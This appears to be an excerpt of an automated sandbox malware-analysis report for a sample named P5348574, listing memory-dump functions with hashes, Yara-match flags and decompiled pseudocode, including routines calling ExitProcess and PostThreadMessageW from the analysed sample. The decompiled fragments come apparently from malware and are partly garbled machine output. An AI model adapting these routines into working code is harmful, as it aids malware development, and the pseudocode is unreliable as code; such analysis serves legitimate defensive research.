                                                    Uniqueness Score: -1.00%

                                                    Function 017F99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f5eb3c2ee0e9c502a356955d1a8ecf2742c72e0ebdf89e2d5fa78ae7e96e4d0a
                                                    • Instruction ID: 44c79863c8d8c816161e209b60cc92ec9e1a0fd5c838652de744dd0224302905
                                                    • Opcode Fuzzy Hash: f5eb3c2ee0e9c502a356955d1a8ecf2742c72e0ebdf89e2d5fa78ae7e96e4d0a
                                                    • Instruction Fuzzy Hash: 869002A134100842D14161D94814B060005E7E2341F51C115E2058668DC699CD567166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 10b20414eec17cd291ff9fbe1fc9e4f6e6ade1d3b70f7d1222ee138354f09bd1
                                                    • Instruction ID: ec3f53eff2a56e6c0b596154e94e8cba80b57a3125f29a8be34795ea518a60b0
                                                    • Opcode Fuzzy Hash: 10b20414eec17cd291ff9fbe1fc9e4f6e6ade1d3b70f7d1222ee138354f09bd1
                                                    • Instruction Fuzzy Hash: 1A90027120100813D15261D949047070009A7D1381F91C512A141866CDD6D68A56B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3fd0b1a6838b32cc743eaeaf756ef755ef90bd327d259572ef27e8e10d061f10
                                                    • Instruction ID: 059f6dd1425e2d932f60189cd5b35d7b5eafe29bb37fd47f83b14eff847a594f
                                                    • Opcode Fuzzy Hash: 3fd0b1a6838b32cc743eaeaf756ef755ef90bd327d259572ef27e8e10d061f10
                                                    • Instruction Fuzzy Hash: ED900261242045525586B1D948045074006B7E1381791C112A2408A64CC5A6995AE661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a40ee31ebec050f1b8677b6fffb765f4ab3c5f61a8f42388035426fe757105a8
                                                    • Instruction ID: 4a54efbd670b10b0a43791f400b024926295ef1f0a60ff6381e30fe6b4a4bfd1
                                                    • Opcode Fuzzy Hash: a40ee31ebec050f1b8677b6fffb765f4ab3c5f61a8f42388035426fe757105a8
                                                    • Instruction Fuzzy Hash: E190026160100902D14271D94804616000AA7D1381F91C122A2018669ECAA58A96B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b2e55809ff2c576548c79f30405c9445a0a7611ac4158f76d486ef07dc4eccfa
                                                    • Instruction ID: 465ffc665ef77fb2d3269130ec8533b5f5951d386c28e16ae9df96814200fbfe
                                                    • Opcode Fuzzy Hash: b2e55809ff2c576548c79f30405c9445a0a7611ac4158f76d486ef07dc4eccfa
                                                    • Instruction Fuzzy Hash: 4490026121180442D24165E94C14B070005A7D1343F51C215A1148668CC99589656561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fa6e866c76751d4c985cd0d95b61166cb1944a4876249fc068ce02a50004d6b0
                                                    • Instruction ID: ee79b855dbe10269ea1cd03a23a60983d194dc9fdf3e81c681ab449ce8f7be20
                                                    • Opcode Fuzzy Hash: fa6e866c76751d4c985cd0d95b61166cb1944a4876249fc068ce02a50004d6b0
                                                    • Instruction Fuzzy Hash: 6A90026160100442418171E98C449064005BBE2351751C221A198C664DC5D9896966A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 19207099c4e7e196102e6dadaa2425c60251b69868600dd25e2381ec05fb4f3a
                                                    • Instruction ID: ac576ef2b52785e7a398d064762d097e6e246b94f351b1830ea8302cefa1d95f
                                                    • Opcode Fuzzy Hash: 19207099c4e7e196102e6dadaa2425c60251b69868600dd25e2381ec05fb4f3a
                                                    • Instruction Fuzzy Hash: 1090027120140802D14161D94C1470B0005A7D1342F51C111A2158669DC6A5895575B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6a501924ef0a8c5b984ce021433b3ad150298189a9e7fd274c393f46668b6c79
                                                    • Instruction ID: 4d20fd2d392a42b307a86a837961584cda99be159c9adac83e836123c2e4e805
                                                    • Opcode Fuzzy Hash: 6a501924ef0a8c5b984ce021433b3ad150298189a9e7fd274c393f46668b6c79
                                                    • Instruction Fuzzy Hash: 6C900265211004030146A5D90B045070046A7D6391351C121F2009664CD6A189656161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2ec1d00fc24d00d0f56079b7ab13f35b1695bbd249857d0866c758911bbc0eec
                                                    • Instruction ID: ff7bc77100ce0e0f80a7cb0fb8a88298e7981b882e53860879aede43f99ed4b9
                                                    • Opcode Fuzzy Hash: 2ec1d00fc24d00d0f56079b7ab13f35b1695bbd249857d0866c758911bbc0eec
                                                    • Instruction Fuzzy Hash: BC9002A120200403414671D94814616400AA7E1341B51C121E20086A4DC5A589957165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 23bc96aebf51bf6d467de140e808df389094920c7f42013becaa12e70e4ab881
                                                    • Instruction ID: ef332ff03f9e19f98d73ae487e3f8a3de6cb065754ad472895e9f0ba570f1169
                                                    • Opcode Fuzzy Hash: 23bc96aebf51bf6d467de140e808df389094920c7f42013becaa12e70e4ab881
                                                    • Instruction Fuzzy Hash: 7290027120100802D14165D958086460005A7E1341F51D111A6018669EC6E589957171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b028c0108eca399bf9cc150f05bdb90c040a749cf37925b8060820fc1c78d365
                                                    • Instruction ID: 4101cf315474823431ab073f752a000ece916309b0268fd8921720799e207aff
                                                    • Opcode Fuzzy Hash: b028c0108eca399bf9cc150f05bdb90c040a749cf37925b8060820fc1c78d365
                                                    • Instruction Fuzzy Hash: D890027131114802D15161D988047060005A7D2341F51C511A181866CDC6D589957162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f58b575ecee163adac69235fe6e766288047561d5934f22853ad8eafabcd5a3f
                                                    • Instruction ID: affd6df2791422bf8b4775752f759a36685146bc099784c8d8b4ff5799b39a28
                                                    • Opcode Fuzzy Hash: f58b575ecee163adac69235fe6e766288047561d5934f22853ad8eafabcd5a3f
                                                    • Instruction Fuzzy Hash: 0D90026130100403D18171D958186064005F7E2341F51D111E1408668CD995895A6262
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34814250abab0be8a30d88d324dcd6118e24a0142be4e61879f78959a32324f0
                                                    • Instruction ID: cf8e1556194da003ea9f75a65d19b3902411b230a91896da3262b732fe2e0d5e
                                                    • Opcode Fuzzy Hash: 34814250abab0be8a30d88d324dcd6118e24a0142be4e61879f78959a32324f0
                                                    • Instruction Fuzzy Hash: D090026921300402D1C171D9580860A0005A7D2342F91D515A100966CCC995896D6361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0d5cdc4871cebebf1c4e225344e3f42b030fc93ac9ade5d80f174d65bb424570
                                                    • Instruction ID: 37d7cf077b1a7a83039cfa513aab8ae58cf3dfec0f579dd504c103aac7b4e991
                                                    • Opcode Fuzzy Hash: 0d5cdc4871cebebf1c4e225344e3f42b030fc93ac9ade5d80f174d65bb424570
                                                    • Instruction Fuzzy Hash: 8390027120100C02D1C171D9480464A0005A7D2341F91C115A1019768DCA958B5D77E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 548a0dab4aa92e0d29348fa43ea8cd17b0a6a1258e13d56b0ba8a5f08ea0b9c6
                                                    • Instruction ID: 373577ee14d202c8e874eedf36065dea3731e3d33775fdd97901235384034292
                                                    • Opcode Fuzzy Hash: 548a0dab4aa92e0d29348fa43ea8cd17b0a6a1258e13d56b0ba8a5f08ea0b9c6
                                                    • Instruction Fuzzy Hash: 0B90027120108C02D15161D9880474A0005A7D1341F55C511A541876CDC6D589957161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41e8b3-41e8df call 41f1b3 ExitProcess
                                                    C-Code - Quality: 100%
                                                    			E0041E8B3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x9b0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9b0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                    0x0041e8b6
                                                    0x0041e8cd
                                                    0x0041e8db

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: w5@
                                                    • API String ID: 621844428-2048009441
                                                    • Opcode ID: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                                    • Instruction ID: 1ed00d9a66ebf349a6f1bdeba4fc8f4a3585a7d1f921a18fc4373dfdb201933d
                                                    • Opcode Fuzzy Hash: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                                    • Instruction Fuzzy Hash: B6D01272600314BBD620DB99DC45FD777ACDF456A4F054065BA4C5B242C674BA10C7E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040992B Relevance: 1.7, APIs: 1, Instructions: 185threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 337 40992b-409931 338 409933-40998b call 420183 call 409893 call 41f9d3 337->338 339 4098cf-4098e7 call 402e13 call 4195b3 337->339 354 409993-4099c5 call 4102e3 call 41e703 338->354 348 409920-409926 339->348 349 4098e9-4098fa PostThreadMessageW 339->349 349->348 351 4098fc-40991d call 40c5d3 349->351 351->348 360 4099c7-4099cf 354->360 361 4099fa-409a02 354->361 362 4099d1-4099d8 360->362 363 4099e9-4099f3 360->363 362->363 364 4099da-4099e1 362->364 363->354 365 4099f5-4099f8 363->365 364->363 366 4099e3-4099e7 364->366 367 409a20-409a32 call 41e693 365->367 366->363 368 409a03-409a1d call 420103 366->368 367->361 372 409a34-409a9f call 41df13 367->372 368->367 372->361 376 409aa5-409b01 call 41df53 372->376 376->361 379 409b07-409b54 call 41f673 call 41f693 call 420323 call 420103 call 4191a3 376->379
                                                    C-Code - Quality: 75%
                                                    			E0040992B(void* __eflags, intOrPtr _a4, int _a8, int _a12, int _a16) {
				int _v8;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				int __esi;
				int _t60;
				void* _t63;
				void* _t67;
				long _t69;
				void* _t70;
				int _t71;

				asm("sahf");
				if(__eflags < 0) {
					_t60 = E004195B3(_t70, _t67, 0, 0, E00402E13());
					_t71 = _t60;
					if(_t71 != 0) {
						_t69 =  *0xFFFFFFFFF2FE0EE5;
						_t60 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
						if(_t60 == 0) {
							_t3 = (E0040C5D3(1, 8, _t63 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
							_t60 =  *_t71(_t69, 0x8003, 0xf2fe0ed9 + _t3, _t60);
						}
					}
					return _t60;
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E00420183( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E00409893(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041F9D3(__ecx);
					_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t12;
					_a16 = 0;
					while(1) {
						__eax = E004102E3(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E703(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L11:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L15;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L11;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L11;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420103(_a12,  &_v688, 0x2a8);
										L15:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E693(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t32 = __esi + 0x2e8; // 0x2e8
											__eax = _t32;
											 *_t32 = _v136;
											__eax = _a12;
											_t34 = __esi + 0x314; // 0x314
											__ebx = _t34;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF13(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t42 = __esi + 0x2e0; // 0x2e0
												__eax = _t42;
												_push(_t42);
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												__ecx = _a12;
												_push(__ebx);
												_push(0x1a);
												__ecx = _a12 + 0x224;
												_push(_a12 + 0x224);
												 *(__esi + 0x2e4) = __edx;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E0041DF53(__ebx, __edx, __edi);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041F673(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E00420323( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t57 = __eax + 2; // 0x2
													__ecx = __eax + _t57;
													__eax =  &_v656;
													__eax = E004191A3(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L11;
									}
								}
							}
						}
						goto L19;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L19:
			}



















                                                    0x0040992b
                                                    0x00409931
                                                    0x004098db
                                                    0x004098e0
                                                    0x004098e7
                                                    0x004098e9
                                                    0x004098f6
                                                    0x004098fa
                                                    0x00409913
                                                    0x0040991e
                                                    0x0040991e
                                                    0x004098fa
                                                    0x00409926
                                                    0x00409933
                                                    0x00409933
                                                    0x00409934
                                                    0x00409936
                                                    0x0040993c
                                                    0x0040993d
                                                    0x0040993e
                                                    0x0040993f
                                                    0x00409947
                                                    0x0040994a
                                                    0x00409957
                                                    0x0040995c
                                                    0x0040995f
                                                    0x00409965
                                                    0x0040996a
                                                    0x00409972
                                                    0x0040997d
                                                    0x0040997d
                                                    0x00409984
                                                    0x00409993
                                                    0x00409999
                                                    0x0040999e
                                                    0x004099ab
                                                    0x004099b5
                                                    0x004099bd
                                                    0x004099c3
                                                    0x004099c5
                                                    0x00000000
                                                    0x00000000
                                                    0x004099c7
                                                    0x004099cf
                                                    0x004099e9
                                                    0x004099e9
                                                    0x004099ec
                                                    0x004099ed
                                                    0x004099f0
                                                    0x004099f3
                                                    0x00000000
                                                    0x004099f5
                                                    0x004099f5
                                                    0x00000000
                                                    0x004099f5
                                                    0x004099d1
                                                    0x004099d1
                                                    0x004099d8
                                                    0x00000000
                                                    0x004099da
                                                    0x004099da
                                                    0x004099e1
                                                    0x00000000
                                                    0x004099e3
                                                    0x004099e3
                                                    0x004099e7
                                                    0x00409a03
                                                    0x00409a0b
                                                    0x00409a13
                                                    0x00409a18
                                                    0x00409a20
                                                    0x00409a20
                                                    0x00409a28
                                                    0x00409a30
                                                    0x00409a32
                                                    0x00000000
                                                    0x00409a34
                                                    0x00409a34
                                                    0x00409a3a
                                                    0x00409a3d
                                                    0x00409a43
                                                    0x00409a46
                                                    0x00409a4c
                                                    0x00409a4c
                                                    0x00409a53
                                                    0x00409a55
                                                    0x00409a58
                                                    0x00409a58
                                                    0x00409a5f
                                                    0x00409a62
                                                    0x00409a69
                                                    0x00409a6f
                                                    0x00409a75
                                                    0x00409a7b
                                                    0x00409a81
                                                    0x00409a87
                                                    0x00409a8d
                                                    0x00409a92
                                                    0x00409a97
                                                    0x00409a9d
                                                    0x00409a9f
                                                    0x00000000
                                                    0x00409aa5
                                                    0x00409aa5
                                                    0x00409aa8
                                                    0x00409aa8
                                                    0x00409aae
                                                    0x00409aaf
                                                    0x00409ab5
                                                    0x00409abb
                                                    0x00409ac1
                                                    0x00409ac7
                                                    0x00409acd
                                                    0x00409ad0
                                                    0x00409ad1
                                                    0x00409ad3
                                                    0x00409ad9
                                                    0x00409adb
                                                    0x00409ae1
                                                    0x00409ae7
                                                    0x00409af1
                                                    0x00409af9
                                                    0x00409aff
                                                    0x00409b01
                                                    0x00000000
                                                    0x00409b07
                                                    0x00409b07
                                                    0x00409b0d
                                                    0x00409b0d
                                                    0x00409b13
                                                    0x00409b20
                                                    0x00409b22
                                                    0x00409b26
                                                    0x00409b2b
                                                    0x00409b2e
                                                    0x00409b2e
                                                    0x00409b3e
                                                    0x00409b46
                                                    0x00409b4e
                                                    0x00409b4f
                                                    0x00409b50
                                                    0x00409b51
                                                    0x00409b53
                                                    0x00409b54
                                                    0x00409b54
                                                    0x00409b01
                                                    0x00409a9f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004099e7
                                                    0x004099e1
                                                    0x004099d8
                                                    0x00000000
                                                    0x004099cf
                                                    0x004099fa
                                                    0x004099fb
                                                    0x004099fc
                                                    0x004099fc
                                                    0x004099fe
                                                    0x004099ff
                                                    0x00409a01
                                                    0x00409a02
                                                    0x00409a02
                                                    0x00000000

                                                    APIs
                                                    • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                                    • Instruction ID: 42ad5854a2e7b942de746f5d6c01182a578b4c63b133ec1084285a3336115312
                                                    • Opcode Fuzzy Hash: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                                    • Instruction Fuzzy Hash: F461B4B0A00305AFD724DF65DC86BEB73A8EB45304F00457EF949A7381DB74AE418BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409893 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 71%
                                                    			E00409893(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				void* _t24;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420183( &_v67, 0, 0x3f);
				E00420C33( &_v68, 3);
				_t19 = _a4;
				_t26 = _a4 + 0x20;
				_t13 = E0040CF03(_t32, _a4 + 0x20,  &_v68); // executed
				_push(0xbf25f8a5);
				_t24 = _t13;
				_t15 = E004195B3(_t26, _t24, 0, 0, E00402E13());
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t9 = (E0040C5D3(1, 8, _t19 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
						return  *_t27(_t25, 0x8003, _t28 + _t9, _t15);
					}
				}
				return _t15;
			}












                                                    0x00409893
                                                    0x004098a4
                                                    0x004098a8
                                                    0x004098b3
                                                    0x004098b8
                                                    0x004098bf
                                                    0x004098c3
                                                    0x004098c8
                                                    0x004098cd
                                                    0x004098db
                                                    0x004098e0
                                                    0x004098e7
                                                    0x004098e9
                                                    0x004098f6
                                                    0x004098fa
